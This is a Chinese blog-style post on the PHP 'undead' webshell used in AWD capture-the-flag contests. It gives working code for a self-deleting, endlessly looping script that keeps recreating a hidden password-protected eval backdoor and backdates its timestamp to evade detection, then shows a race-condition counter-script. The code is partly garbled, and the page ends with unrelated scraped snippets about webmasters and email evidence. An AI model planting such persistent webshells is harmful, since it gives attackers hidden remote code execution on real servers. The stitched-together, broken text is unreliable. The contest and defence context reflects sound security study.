乙個簡單的不死馬如:
ignore_user_abort(true);
set_time_limit(0);
unlink(__file__);
$file = '.3.php';
$code = '<?php if(md5($_get["pass"])=="1a1dc91c907325c69271ddf0c944bc72") ?>';
//pass=pass
while (1){
file_put_contents($file,$code);
system('touch -m -d "2018-12-01 09:10:12" .3.php');
usleep(5000);
簡單解釋一下php不死馬**:
ignore_user_abort(true);
設定與客戶機斷開是否會終止指令碼的執行,這裡設定為true則忽略與使用者的斷開,即使與客戶機斷開指令碼仍會執行。
set_time_limit(0);
設定指令碼最大執行時間,這裡設定為0,即沒有時間方面的限制
unlink(__file__);
刪除檔案本身,以起到隱蔽自身的作用
while (1){
file_put_contents($file,$code);
system('touch -m -d "2018-12-01 09:10:12" .3.php');
usleep(5000);
while迴圈中每隔usleep(5000)即寫新的後門檔案,system命令用於修改檔案的建立時間或修改時間,因為在awd比賽中有的隊伍使用
find *.php -mmin -10
檢查十分鐘內被修改過的php檔案,所以我們修改檔案日期稍微進行掩飾。
最後校驗是為了防止自家木馬被其他人利用 (烏鴉坐飛機
if(md5($_get["pass"])=="1a1dc91c907325c69271ddf0c944bc72"){
@eval($_post[a]);
對於不死馬,直接刪除指令碼是沒有用的,因為php執行的時候已經把指令碼讀進去解釋成opcode執行了,關於opcode有:
個人感覺是記憶體或者緩衝一類的東西趴。
這裡使用條件競爭寫入同名檔案進行克制不死馬。
可以看到現在的 .3.php 檔案內容仍為:
我們上傳乙個寫 .3.php 的php檔案,注意usleep需要比不死馬小,$code修改為無害內容
ignore_user_abort(true);
set_time_limit(0);
unlink(__file__);
$file = '.3.php';
$code = 'hi springbird !';
//pass=pass
while (1){
file_put_contents($file,$code);
system('touch -m -d "2018-12-01 09:10:12" .3.php');
// usleep(5000);
usleep(1000);
注意紅框
上傳至伺服器並訪問
再次檢視 .3.php 檔案內容
可以看到內容已無害
不死馬php如何取證 php不死馬如何刪除
什麼是不死馬?記憶體馬,通俗講就是不死馬,就是會執行一段永遠不退出的程式常駐在php程序裡,無限執行。不死馬.php 上傳到server server執行檔案 server本地無限迴圈生成 一句話.php 網上流傳的不死馬 set time limit 0 unlink file file 2.ph...
如何養好「四氣」做不死站長
我混跡於紅塵,在 奔三 之交,自己終於擁有了乙個帶 長 的身份。憶往昔,在觥杯交錯之間,一舉杯,部長我敬您!二舉杯,處長我敬您!三舉杯,科長我敬您!四舉杯,到我了,小周我敬你。停,現在你得改口說,站長我敬您。因為我現在是個人 站長!站長是怎麼練成的?養好 四氣 就成。必勝的勇氣 成功勵志導師奧里森 ...
郵件作為證據如何提交 電子郵件如何取證 舉證?
一 法院如何審查電子郵件真偽?第一,審查郵箱的取得方式。第二,審查發件人 收件人。第三,審查郵件到達時間。第四,審查郵件正文的內容。第五,郵件內容是否與其他證據相互印證,形成證據鏈條。需要注意的是 法院審查當事人提交的已經公證機關公證的電子郵件,還需要審查是否符合 公證法 等規定,為合法有效的公證書...